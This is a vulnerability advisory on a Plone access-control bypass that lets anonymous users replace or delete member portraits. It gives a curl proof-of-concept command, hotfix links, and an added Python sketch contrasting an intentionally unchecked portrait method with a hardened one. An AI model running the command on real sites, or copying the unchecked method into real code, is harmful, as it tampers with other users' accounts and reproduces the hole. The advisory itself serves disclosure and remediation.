Plone MembershipTool Access Control Bypass Vulnerability
BID:17484
Info
| Field | Value |
| --- | --- |
| Bugtraq ID | 17484 |
| Class | Access Validation Error |
| CVE | CVE-2006-1711 |
| Remote | Yes |
| Local | No |
| Published | Apr 12 2006 12:00AM |
| Updated | Apr 12 2006 11:22PM |
| Credit | mj reported this issue to the vendor. |
| Vulnerable | Plone 2.5-beta1, Plone 2.1.2, Plone 2.0.5, Plone 2.0.4; Debian Linux 3.1 (alpha, amd64, arm, hppa, ia-32, ia-64, m68k, mips, mipsel, ppc, s/390, sparc) |
| Not Vulnerable | |
Discussion
Plone is susceptible to a remote access-control bypass vulnerability. The issue is due to the application's failure to properly enforce privileges on various MembershipTool methods.
This issue allows remote, anonymous attackers to modify and delete the portrait images of members. This may help attackers exploit latent vulnerabilities in image-rendering software. Other attacks may also be possible.
Exploit / POC
Attackers may use standard web client applications to exploit this issue.
The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:
```
curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
```
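The authorization gap the advisory describes, as an added Python illustration that is not Plone's code: a hypothetical MembershipTool whose unchecked portrait method trusts the submitted member_id, beside a hardened version that requires an authenticated caller who is either that member or holds the Manager role. Class and function names here are constructed for the example.

```python
"""Constructed model of the advisory's missing authorization check; not Plone's
code. MembershipTool, Caller and can_change are hypothetical names."""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Optional


class Unauthorized(Exception):
    """Raised when the caller may not act on the requested member's portrait."""


@dataclass(frozen=True)
class Caller:
    user_id: Optional[str]                 # None models an anonymous request
    roles: FrozenSet[str] = frozenset()


@dataclass
class MembershipTool:
    portraits: Dict[str, bytes] = field(default_factory=dict)  # member_id -> image

    # Vulnerable shape: trusts the submitted member_id and never asks who is
    # calling, so an anonymous POST can overwrite or remove anyone's portrait.
    def change_member_portrait_unchecked(self, member_id: str, portrait: bytes) -> None:
        self.portraits[member_id] = portrait

    # Hardened shape: refuse anonymous callers; allow only self-edits unless Manager.
    def _check_can_edit(self, caller: Caller, member_id: str) -> None:
        if caller.user_id is None:
            raise Unauthorized("authentication required")
        if caller.user_id != member_id and "Manager" not in caller.roles:
            raise Unauthorized(f"{caller.user_id} may not edit {member_id}'s portrait")

    def change_member_portrait(self, caller: Caller, member_id: str, portrait: bytes) -> None:
        self._check_can_edit(caller, member_id)
        # Reject uploads that are not image data, narrowing what reaches the
        # image-rendering code the advisory names as a secondary risk.
        if not portrait.startswith((b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")):
            raise ValueError("portrait must be a PNG, JPEG or GIF image")
        self.portraits[member_id] = portrait

    def delete_portrait(self, caller: Caller, member_id: str) -> None:
        self._check_can_edit(caller, member_id)
        self.portraits.pop(member_id, None)


def can_change(tool: MembershipTool, caller: Caller, member_id: str, portrait: bytes) -> bool:
    """True if the hardened method accepts the request, False if it refuses it."""
    try:
        tool.change_member_portrait(caller, member_id, portrait)
        return True
    except (Unauthorized, ValueError):
        return False
```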
Solution / Fix
Solution:
The vendor has released a hotfix to address this issue.
Please see the referenced vendor advisories for further information on obtaining and applying fixes.

| Affected version | Fix |
| --- | --- |
| Plone 2.5-beta1 | PloneHotfix20060410.tar.gz: http://plone.org/products/plonehotfix20060410/releases/1.0/PloneHotfix20060410.tar.gz |
| Plone 2.0.5 | PloneHotfix20060410.tar.gz: http://plone.org/products/plonehotfix20060410/releases/1.0/PloneHotfix20060410.tar.gz |
| Plone 2.1.2 | PloneHotfix20060410.tar.gz: http://plone.org/products/plonehotfix20060410/releases/1.0/PloneHotfix20060410.tar.gz |
References
References:
- Plone Homepage (Plone)
- Plone Hotfix 2006-04-10 (Plone)
- Ticket #5432 (defect) (Plone)